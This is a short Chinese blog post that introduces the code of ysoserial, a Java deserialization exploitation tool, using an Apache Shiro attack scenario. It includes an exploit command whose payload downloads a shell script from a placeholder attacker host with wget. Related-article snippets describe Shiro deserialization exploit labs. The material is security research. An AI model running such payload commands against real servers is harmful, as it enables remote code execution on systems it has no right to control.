ysoserial的代码学习

最新推荐文章于 2024-04-10 00:29:44 发布
最新推荐文章于 2024-04-10 00:29:44 发布
阅读量613 收藏 1
点赞数 1
分类专栏: 安全工具开发 文章标签: ysoserial Java反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/108292771
版权

反序列化漏洞利用神器:ysoserial

0x01 ysoserial 工具模块

我们以为shiro远程加载反序列化数据的利用场景为例:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345  CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test'

其中-cp指定了类路径为:

ysoserial.exploit.JRMPListener

打开ysoserial.exploit.JRMPListener,找到主函数:

其中 ObjectPayload.Utils.makePayloadObject方法具体实现:

 

Adsatrtgo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Shiro Java反序列化漏洞(CVE-2016-4437)
qq_45300786的博客
12-25 683
我只是个无情的挂马机器,原理相信百度一大把,我就不赘述了 0x00 环境要求 靶机:192.168.100.23 攻击机:192.168.100.34 0x01 环境搭建 这里使用docker进行环境搭建: 下载 git clone https://github.com/Medicean/VulApps/tree/master/s/shiro/1 1.拉取环境到本地 $ docker pull medicean/vulapps:s_shiro_1 2.启动环境 $ docker run -d -p 8080
ysoserial-0.0.6-SNAPSHOT-all.jar
05-23
编译好的ysoserial.可反序列化问题。
Java反序列化ysoserial URLDNS模块分析,2024年最新大佬推荐
最新发布
2401_83620865的博客
04-10 759
如果你已经下定决心要转行做编程行业,在最开始的时候就要对自己的学习有一个基本的规划,还要对这个行业的技术需求有一个基本的了解。有一个已就业为目的的学习目标,然后为之努力,坚持到底。如果你有幸看到这篇文章,希望对你有所帮助,祝你转行成功。一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 1743
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
java 漏洞复现_Apache Shiro java反序列化漏洞复现
weixin_42526484的博客
03-02 162
Apache Shiro java反序列化漏洞复现 影响版本Apache Shiro <= 1.2.4环境搭建准备环境攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境**靶机:**带docker的Linux就行靶机环境搭建获取docker镜像docker pull...
【Web安全】Ysoserial 简单利用
buffedon的博客
12-30 6332
Ysoserial 的简单使用,包括命令使用与简单原理解释
ysoserial.jar
12-16
ysoserial 是安全测试 playload 生成工具
ysoserial-0.0.6
02-11
ysoserial-0.0.6
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
ysoserial-0.0.2
12-25
weblogic反序列化漏洞 测试用的 有需要的同学拿去用
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
dotnet-ysoserialnet用于各种NET格式化器的反序列化有效负载生成器
08-15
ysoserial.net 用于各种.NET格式化器的反序列化有效负载生成器
ysoserial,用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。.zip
10-13
用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 825
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3258
ysoserial这款工具,堪称为“java反序列利用神器”。
基于ysoserial的深度利用研究(命令回显与内存马)
C20220511的博客
03-24 505
0x01 前言很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。在上一篇文章中↓↓↓记一次反序列化漏洞的利用之路遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。0x02 回显在研究基于反序列化利用链的回显实现之前,首先解决基于反序列化
java序列化理解_对ysoserial工具及java反序列化的一个阶段性理解
weixin_39615808的博客
02-24 284
经过一段时间的琢磨与反思,以及重读了大量之前看不懂的反序列化文章,目前为止算是对java反序列化这块有了一个阶段性的小理解。目前为止,发送的所有java反序列化的漏洞中。主要需要两个触发条件:1、反序列化的攻击入口2、反序列化的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以反序列化。其实这块是有一定的误导性的。在我最初研究反序列化的时候,我觉得攻击链...
反序列化工具ysoserial使用介绍
qq_34778376的博客
02-23 6409
反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload; 下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'
ysoserial安装
08-16
2. 在你的操作系统上创建一个文件夹,用于存放 ysoserial 的代码和相关文件。 3. 打开终端或命令提示符,并进入到该文件夹。 4. 使用 Git 命令克隆 ysoserial 的代码库。运行以下命令: ``` git clone ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值